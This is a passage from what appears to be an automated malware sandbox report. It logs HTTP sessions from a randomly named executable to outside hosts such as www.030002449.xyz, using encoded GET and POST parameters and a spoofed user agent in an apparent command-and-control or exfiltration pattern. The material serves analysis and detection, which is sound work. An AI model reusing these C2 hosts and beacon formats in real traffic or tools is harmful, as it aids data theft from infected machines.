                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 41 4c 67 75 72 55 47 47 6d 4d 44 58 48 52 56 6c 4a 49 41 74 30 49 58 79 61 33 6b 70 6e 41 59 54 74 4f 74 4b 50 45 51 74 2b 75 36 51 73 51 75 78 64 6a 6c 43 41 71 69 2b 6c 72 4e 75 41 70 76 4d 44 7a 71 44 50 74 79 70 45 77 49 74 78 48 47 71 72 45 56 70 78 75 65 6b 49 74 4b 66 45 70 77 6d 69 6e 71 48 4e 68 37 2f 77 2b 79 34 65 53 45 52 52 44 61 64 41 32 7a 79 51 69 32 47 78 72 41 66 5a 31 39 51 46 2b 56 6d 52 4d 46 63 4f 65 42 42 68 79 55 54 32 36 64 46 65 30 67 70 56 43 75 38 33 4c 58 2b 50 6b 58 70 68 64 31 70 34 78 79 6f 72 75 66 39 46 71 36 47 76 4c 63 35 33 4a 45 39 58 52 54 43 4d 69 70 6b 62 53 6a 6b 6e 62 5a 34 6f 47 76 74 69 66 46 78 42 6b 45 4f 4f 47 4f 39 68 74 4c 66 6c 57 67 79 43 42 5a 37 62 42 48 66 66 58 6f 36 73 4e 38 58 46 45 2f 36 5a 73 41 73 51 2b 70 33 6a 65 68 53 56 4d 68 5a 70 2b 30 37 53 74 67 5a 4a 6e 37 4c 59 48 32 4b 65 38 79 2f 74 4d 44 4e 77 50 57 61 70 44 6b 4c 4a 4d 71 56 5a 75 47 74 33 46 39 36 45 54 43 4d 4e 79 43 34 7a 54 2b 46 4e 62 6d 75 58 79 [TRUNCATED]
                                                                        Data Ascii: QhKxhNP=ALgurUGGmMDXHRVlJIAt0IXya3kpnAYTtOtKPEQt+u6QsQuxdjlCAqi+lrNuApvMDzqDPtypEwItxHGqrEVpxuekItKfEpwminqHNh7/w+y4eSERRDadA2zyQi2GxrAfZ19QF+VmRMFcOeBBhyUT26dFe0gpVCu83LX+PkXphd1p4xyoruf9Fq6GvLc53JE9XRTCMipkbSjknbZ4oGvtifFxBkEOOGO9htLflWgyCBZ7bBHffXo6sN8XFE/6ZsAsQ+p3jehSVMhZp+07StgZJn7LYH2Ke8y/tMDNwPWapDkLJMqVZuGt3F96ETCMNyC4zT+FNbmuXyGYzvKAUDv1+rFNUx5TsD4FC+zSNWqaUEbNLnHpc8YqjbyNh1CmL1aaPYfibZdI7dxZdhMR7eqR61aR63bWAC2sLyTiNsW1Lny/nKm2oGBLprFsL64+O4kDgIu5bK5zMCOEYHhdurcekE+zJESkHg0Eut8Wcw3ceam4I6BVo05gG3qb45wCihQ9umQlMuWYndwQzANPaNPMKjuTKC04LsKH/9oHgACP4/gVN/aH1JnJQdkfrD91/Dc6HLmXqaMpiKm6pFsGYxpXHJe05zOyYUGwPT2k/58nuJyo7QPEdu+i84XQO1K8sZ1QuIlwKqohhckrdv48ATjYj/FuFICmtqb48AEBCHYajLUxw+udqOyHM2T9acvPUmDU+2fvpN70evKaf25YYIpN10LfNAXZz29DW8Qe9tjePTRbS/1Bx9O/wiEN7gzQLEathTaFHDFn8/2USSj24pd6aCG5CPDCeltpj5pzR9PRFIO87x4dHvHhjspUMLd+ogkXuzwNzQmDQDXs7hlPH9/JF3rmPtgUMpzmovTGJDANA4e6sV7Nic6Ofqrrvd3v+SqxjS3xJGN5xqFsqBkspz4tomATB5E4h7/N8pBD5Q4rEzByEgccQ6aZ1oUbvY5Uq7JyYCaDjYrZW8w7GzxJPs9jSr4wwZtVA4vK2FKoCY6+vNX5 [TRUNCATED]
                                                                        Nov 28, 2024 09:16:31.380040884 CET295INHTTP/1.1 405 Not Allowed
                                                                        Server: nginx
                                                                        Date: Thu, 28 Nov 2024 08:16:31 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 150
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        40192.168.2.55002252.60.87.163802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:16:32.883420944 CET544OUTGET /jcsf/?QhKxhNP=NJIOohqps9aNaGk8Gv0x95TXV1ke4jY2ru9PIld0z7+iuCSmXzhmM46cxc5xGqvTMH7YV8ukdWwIlgb06ERZu+HhQde6PspHhBqQKwPZwv/EXFgjFQrkOjXlWxa7+IRGPg==&Yby=d2ydCtHpb8 HTTP/1.1
                                                                        Host: www.carpentry.club
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Nov 28, 2024 09:16:34.075501919 CET1236INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Thu, 28 Nov 2024 08:16:33 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Content-Length: 17692
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Vary: Accept-Encoding
                                                                        Cache-Control: max-age=604800
                                                                        Expires: Sun, 01 Dec 2024 08:16:31 +0000
                                                                        Content-Security-Policy: default-src 'self' 'unsafe-inline' https://park.101datacenter.net https://*.deviceatlascloud.com/ https://cs.deviceatlas-cdn.com data:
                                                                        Access-Control-Allow-Origin: https://park.101datacenter.net
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Cached: HIT
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 75 74 75 72 65 20 68 6f 6d 65 20 6f 66 20 63 61 72 70 65 6e 74 72 79 2e 63 6c 75 62 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 44 6f 6d 61 69 6e 20 4e 61 6d 65 20 52 65 67 69 73 74 72 61 74 69 6f 6e 20 2d 20 72 65 67 69 73 74 65 72 20 79 6f 75 72 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 6c 69 6e 65 2c 61 6e 64 20 67 65 74 20 74 68 65 20 6e 61 6d 65 20 79 6f 75 20 77 61 6e 74 20 77 68 69 6c 65 20 69 74 27 73 20 73 74 69 6c 6c 20 61 76 61 69 6c 61 62 6c 65 2e 20 49 6e 74 65 72 6e 65 74 20 44 6f 6d 61 69 6e 20 52 65 67 69 73 74 72 61 74 69 6f 6e 20 26 20 49 6e 74 65 72 6e 61 74 69 6f 6e 61 6c 20 44 6f 6d 61 69 6e 20 4e 61 6d 65 20 52 65 67 69 73 74 72 61 74 69 6f 6e 2e 22 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 [TRUNCATED]
                                                                        Data Ascii: <!DOCTYPE html><html dir="ltr" lang="en" ><head><title>Future home of carpentry.club</title><meta name="description" content="Domain Name Registration - register your domain name online,and get the name you want while it's still available. Internet Domain Registration & International Domain Name Registration."><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0" /><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /><meta name="robots" content="index, follow" /><meta name="googlebot" content="index, follow" /><meta NAME="revisit-after" CONTENT="15 days"><script type="text/javascript">resource_url = decodeUR
                                                                        Nov 28, 2024 09:16:34.075728893 CET1236INData Raw: 49 43 6f 6d 70 6f 6e 65 6e 74 28 27 68 74 74 70 73 25 33 41 25 32 46 25 32 46 70 61 72 6b 2e 31 30 31 64 61 74 61 63 65 6e 74 65 72 2e 6e 65 74 27 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20
                                                                        Data Ascii: IComponent('https%3A%2F%2Fpark.101datacenter.net');</script><link rel="shortcut icon" href="https://park.101datacenter.net/images/vendor-1/icon/101domain.ico"><link rel="preload" as="font" type="font/woff2" crossorigin="anonymous" href="htt
                                                                        Nov 28, 2024 09:16:34.075742960 CET1236INData Raw: 29 20 32 25 7d 2e 70 61 67 65 2d 72 6f 77 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 72 6f 77 5f 66 75 6c 6c 7b 67 72 69 64
                                                                        Data Ascii: ) 2%}.page-row{display:flex;position:relative;flex-direction:column}.row_full{grid-column:2/span 12}.col-base{position:relative;display:flex;flex-direction:column;align-items:center}.page-footer.centered,.page-header.centered,.page-section.cen
                                                                        Nov 28, 2024 09:16:34.076488018 CET1236INData Raw: 65 6c 6c 20 2e 63 6f 6c 2d 62 61 73 65 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 31 64 65 65 33 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a
                                                                        Data Ascii: ell .col-base{border-bottom:1px solid #d1dee3;padding-bottom:1.5rem;margin-bottom:1.5rem}.upsell .col-base:last-child{border-bottom:none;padding-bottom:0;margin-bottom:0}.upsell h3{margin:0 0 1rem 0;display:flex;align-items:center;justify-cont
                                                                        Nov 28, 2024 09:16:34.076514959 CET896INData Raw: 6c 20 2e 63 6f 6c 2d 62 61 73 65 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 31 70 78 20 73
                                                                        Data Ascii: l .col-base{border-bottom:none;padding-bottom:0;margin-bottom:0;border-right:1px solid #d1dee3;padding-right:1.5rem;margin-right:1.5rem;display:flex;flex-direction:column;justify-content:space-between;min-height:12rem}.upsell .col-base:last-ch
                                                                        Nov 28, 2024 09:16:34.077272892 CET1236INData Raw: 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 37 2e 30 36 33 65 6d 29 7b 2e 75 70 73 65 6c 6c 20 2e 63 6f 6c 2d 62 61 73 65 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 38 72 65 6d 7d 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79
                                                                        Data Ascii: nd (min-width:77.063em){.upsell .col-base{min-height:8rem}}</style></head><body><svg xmlns="http://www.w3.org/2000/svg" style="display: none;"><symbol id="user-icon" viewBox="0 0 21.11 24.13" ><path d="M10.56,12.06c3.33,0,6.03-2.7,6.03-6
                                                                        Nov 28, 2024 09:16:34.077286959 CET1236INData Raw: 6d 62 6f 6c 3e 0a 3c 73 79 6d 62 6f 6c 20 69 64 3d 22 73 65 61 72 63 68 2d 69 63 6f 6e 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 32 2e 36 32 20 32 32 2e 36 32 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 32 32 2e 33 31 2c 31 39 2e 35 36 6c 2d 34
                                                                        Data Ascii: mbol><symbol id="search-icon" viewBox="0 0 22.62 22.62"><path d="M22.31,19.56l-4.41-4.4c-0.2-0.2-0.47-0.31-0.75-0.31h-0.72c1.22-1.56,1.94-3.52,1.94-5.65C18.38,4.11,14.27,0,9.19,0 C4.11,0,0,4.11,0,9.19c0,5.08,4.11,9.19,9.19,9.19c2.13,0,4.1-0.
                                                                        Nov 28, 2024 09:16:34.078151941 CET1236INData Raw: 38 48 30 2e 36 39 43 30 2e 33 31 2c 32 32 2e 34 2c 30 2c 32 32 2e 37 31 2c 30 2c 32 33 2e 30 39 76 30 2e 36 39 63 30 2c 31 2e 35 32 2c 31 2e 32 35 2c 32 2e 37 36 2c 32 2e 37 38 2c 32 2e 37 36 68 32 32 2e 32 34 63 31 2e 35 33 2c 30 2c 32 2e 37 38
                                                                        Data Ascii: 8H0.69C0.31,22.4,0,22.71,0,23.09v0.69c0,1.52,1.25,2.76,2.78,2.76h22.24c1.53,0,2.78-1.24,2.78-2.76 v-0.69C27.79,22.71,27.48,22.4,27.1,22.4z"/></symbol><symbol id="no-icon" viewBox="0 0 27.68 26.64"><path d="M24.91,6.58c0-1.14-0.93-2.08-2.08-
                                                                        Nov 28, 2024 09:16:34.078170061 CET1236INData Raw: 2c 30 2c 32 2e 32 37 76 31 35 2e 31 31 63 30 2c 31 2e 32 35 2c 31 2e 30 32 2c 32 2e 32 37 2c 32 2e 32 37 2c 32 2e 32 37 68 39 2e 30 37 6c 2d 30 2e 37 36 2c 32 2e 32 37 68 2d 33 2e 34 63 2d 30 2e 36 33 2c 30 2d 31 2e 31 33 2c 30 2e 35 31 2d 31 2e
                                                                        Data Ascii: ,0,2.27v15.11c0,1.25,1.02,2.27,2.27,2.27h9.07l-0.76,2.27h-3.4c-0.63,0-1.13,0.51-1.13,1.13 c0,0.63,0.5,1.13,1.13,1.13h12.85c0.63,0,1.13-0.51,1.13-1.13c0-0.63-0.51-1.13-1.13-1.13h-3.4l-0.76-2.27h9.07 c1.25,0,2.27-1.02,2.27-2.27V2.27C27.21,1.02,2
                                                                        Nov 28, 2024 09:16:34.078825951 CET1236INData Raw: 73 3f 3c 2f 68 32 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 62 61 73 65 20 63 6f 6c 2d 68 61 6c 66 2d 77 69 64 74 68 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 68 6f 69 63 65 2d 69 63 6f 6e 20 79 65 73 22 3e 0a 3c 73 76 67 3e 3c
                                                                        Data Ascii: s?</h2><div class="col-base col-half-width"><div class="choice-icon yes"><svg><use xlink:href="#yes-icon"></use></svg></div><h3>Yes, this is my domain.</h3><p>Sign in to manage your domain and account.</p><a class="choice-link yes" href
                                                                        Nov 28, 2024 09:16:34.195972919 CET1236INData Raw: 72 2d 6f 6e 6c 79 22 3e 43 68 65 63 6b 20 6f 75 74 20 6f 75 72 20 70 72 6f 64 75 63 74 73 3c 2f 68 32 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 62 61 73 65 20 63 6f 6c 2d 74 68 69 72 64 2d 77 69 64 74 68 22 3e 0a 3c 68 33 3e 3c 69 6d
                                                                        Data Ascii: r-only">Check out our products</h2><div class="col-base col-third-width"><h3><img src="https://park.101datacenter.net/images/vendor-1/google_workspace.png" alt="Google Workspace logo" width="185" height="24" /></h3><p>A collection of collab


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        41192.168.2.550023161.97.142.144802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:16:40.030689955 CET799OUTPOST /cfqm/ HTTP/1.1
                                                                        Host: www.030002449.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 208
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.030002449.xyz
                                                                        Referer: http://www.030002449.xyz/cfqm/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 49 46 4b 74 77 4d 2f 6c 54 57 77 47 65 66 4a 2f 70 55 45 43 2f 4e 31 54 61 73 73 71 76 50 6b 43 31 43 2b 61 63 48 31 6b 69 72 4a 30 56 41 6b 36 4e 45 6f 36 67 70 45 6c 71 2b 35 62 6e 37 62 51 6f 73 6f 6e 57 42 64 33 2f 6f 4b 36 41 48 78 2f 70 4c 59 47 58 73 47 4b 44 42 73 4f 69 6d 65 32 67 52 78 45 2b 73 6b 59 70 64 36 4c 55 53 6c 69 44 46 36 4c 58 42 35 62 53 77 37 7a 39 4a 61 50 43 66 45 76 4a 39 65 62 34 58 43 69 6a 65 71 2b 78 41 42 72 4c 56 4b 33 47 7a 77 43 71 54 2b 31 51 41 54 36 33 58 49 4e 44 4e 70 74 2f 56 73 6b 43 4d 51 68 55 46 76 2f 56 6b 41 64 36 69 2b 66 6f 62 67 6c 75 72 4d 3d
                                                                        Data Ascii: QhKxhNP=IFKtwM/lTWwGefJ/pUEC/N1TassqvPkC1C+acH1kirJ0VAk6NEo6gpElq+5bn7bQosonWBd3/oK6AHx/pLYGXsGKDBsOime2gRxE+skYpd6LUSliDF6LXB5bSw7z9JaPCfEvJ9eb4XCijeq+xABrLVK3GzwCqT+1QAT63XINDNpt/VskCMQhUFv/VkAd6i+fobglurM=


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        42192.168.2.550024161.97.142.144802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:16:42.705497026 CET819OUTPOST /cfqm/ HTTP/1.1
                                                                        Host: www.030002449.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 228
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.030002449.xyz
                                                                        Referer: http://www.030002449.xyz/cfqm/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 49 46 4b 74 77 4d 2f 6c 54 57 77 47 66 36 5a 2f 6d 58 38 43 39 74 31 51 47 38 73 71 6c 76 6b 47 31 43 79 61 63 47 77 2f 69 64 78 30 56 6c 41 36 66 78 63 36 68 70 45 6c 67 65 35 61 71 62 62 58 6f 73 31 51 57 44 4a 33 2f 6f 65 36 41 43 31 2f 70 63 73 46 57 38 47 49 64 68 73 41 39 32 65 32 67 52 78 45 2b 74 46 44 70 64 69 4c 58 69 56 69 5a 6b 36 49 66 68 35 61 52 77 37 7a 35 4a 61 4c 43 66 46 4d 4a 35 65 31 34 56 4b 69 6a 62 57 2b 78 55 56 73 42 56 4b 39 4c 54 78 72 74 44 54 6b 57 6a 76 36 37 6d 74 34 51 50 78 58 36 6a 64 4f 59 75 59 4a 48 6c 44 48 46 33 49 71 72 53 66 32 79 34 77 56 77 38 5a 31 74 49 72 6e 4e 61 78 52 62 34 50 61 4f 4f 66 4e 55 6e 30 6a
                                                                        Data Ascii: QhKxhNP=IFKtwM/lTWwGf6Z/mX8C9t1QG8sqlvkG1CyacGw/idx0VlA6fxc6hpElge5aqbbXos1QWDJ3/oe6AC1/pcsFW8GIdhsA92e2gRxE+tFDpdiLXiViZk6Ifh5aRw7z5JaLCfFMJ5e14VKijbW+xUVsBVK9LTxrtDTkWjv67mt4QPxX6jdOYuYJHlDHF3IqrSf2y4wVw8Z1tIrnNaxRb4PaOOfNUn0j
                                                                        Nov 28, 2024 09:16:43.983979940 CET1236INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Thu, 28 Nov 2024 08:16:43 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: W/"66cce1df-b96"
                                                                        Content-Encoding: gzip
                                                                        Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                        Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                                                                        Nov 28, 2024 09:16:43.983995914 CET370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                        Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        43192.168.2.550025161.97.142.144802848C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 28, 2024 09:16:45.385179043 CET1836OUTPOST /cfqm/ HTTP/1.1
                                                                        Host: www.030002449.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Accept-Encoding: gzip, deflate
                                                                        Connection: close
                                                                        Content-Length: 1244
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Origin: http://www.030002449.xyz
                                                                        Referer: http://www.030002449.xyz/cfqm/
                                                                        User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                        Data Raw: 51 68 4b 78 68 4e 50 3d 49 46 4b 74 77 4d 2f 6c 54 57 77 47 66 36 5a 2f 6d 58 38 43 39 74 31 51 47 38 73 71 6c 76 6b 47 31 43 79 61 63 47 77 2f 69 65 52 30 55 58 49 36 4e 69 30 36 77 5a 45 6c 73 2b 35 48 71 62 62 47 6f 73 74 55 57 44 55 4d 2f 71 6d 36 42 6b 4a 2f 2b 65 45 46 66 38 47 49 56 42 73 42 69 6d 66 69 67 52 68 49 2b 73 70 44 70 64 69 4c 58 67 64 69 50 6c 36 49 53 42 35 62 53 77 37 46 39 4a 61 33 43 66 64 79 4a 35 53 4c 34 42 47 69 6a 37 6d 2b 77 6e 74 73 63 6c 4b 7a 4b 54 78 7a 74 44 65 38 57 6a 7a 4d 37 6d 4a 57 51 4e 68 58 34 55 45 6c 46 36 51 32 53 32 58 49 50 31 42 4b 7a 6b 72 4f 38 72 38 68 33 65 64 49 6b 61 50 76 47 38 46 46 61 4c 57 55 56 76 4c 6f 61 77 6c 64 34 55 74 35 52 6c 43 47 46 31 49 30 2f 71 70 2f 79 79 64 65 50 4c 31 7a 69 70 6b 43 58 76 6b 48 50 53 77 67 78 4d 34 79 33 63 6f 4d 6e 2b 6f 6a 38 74 56 33 6b 4f 6a 6d 6b 77 63 53 4e 41 49 5a 51 6c 4c 54 55 47 79 61 31 63 38 4a 78 72 37 67 38 43 73 78 53 37 43 51 2f 69 72 46 35 61 42 4e 6c 48 34 34 7a 65 49 45 72 6b 6a 77 6e 76 [TRUNCATED]
                                                                        Data Ascii: QhKxhNP=IFKtwM/lTWwGf6Z/mX8C9t1QG8sqlvkG1CyacGw/ieR0UXI6Ni06wZEls+5HqbbGostUWDUM/qm6BkJ/+eEFf8GIVBsBimfigRhI+spDpdiLXgdiPl6ISB5bSw7F9Ja3CfdyJ5SL4BGij7m+wntsclKzKTxztDe8WjzM7mJWQNhX4UElF6Q2S2XIP1BKzkrO8r8h3edIkaPvG8FFaLWUVvLoawld4Ut5RlCGF1I0/qp/yydePL1zipkCXvkHPSwgxM4y3coMn+oj8tV3kOjmkwcSNAIZQlLTUGya1c8Jxr7g8CsxS7CQ/irF5aBNlH44zeIErkjwnvGgFke2Xbmjo0P0NnuuQwnVembHVp2CEZPmT/sK/POnznsq4cr/+20kxPy+myc3ln4850qTCMKcZAcWebFTMmY/s5kDn3gZAgQFmeKOdDlZ6QYW8vxS015GsMPydC04ZJnukZCa9F3+6hod1EszaNDOqRpCRjAndmBU6SyGsVBTfhhW8y8YqwaZyle+ZqYHiGJvbTnPsVaR9HLfqnZ/Io6cfO6FqLNhW7rlf+BVTrbSi1eQpoGM7E/rkM56tjzutdYvyNGqIQLZMEPoYm1WuY8F44OLUIAB6nYuzItuCgamA4oyQzoNeZSvPIdPMtE2N61DJi49aD1uCs7elGMZ5Mdeter8RPfuTRX678aKMBFmjJ6m7AzyMr9HTvAUvr7DCMjrj85n+94Vjf0sZdNEKhsUyJ/2bLTy+R2SBmVCIZTiLGi1+iVp/nx+BzRgBfySJf8iYhEHzCYQTLRQUNF/NlHDWa6OWCZD+AgAr5um/aWQAh7poiK5Mk5g8h0E3QVIdy8AXkLegrUZZ9Pm9A79680w82deMPzJU2k8t2qxYy108ZVo15FdLUzawwLVW8XPFV6uJPAVNdFBZUGPLyCbowcgW3tqRTit0fKgQ0zs49IRLIHoz2KGYm7a6B12DlcaJBvyqC+C8V91/x3yVb7SE+7/r4GIPu4HyB/g [TRUNCATED]
                                                                        Nov 28, 2024 09:16:46.601273060 CET1236INHTTP/1.1 404 Not Found
                                                                        Server: nginx
                                                                        Date: Thu, 28 Nov 2024 08:16:46 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        ETag: W/"66cce1df-b96"
                                                                        Content-Encoding: gzip
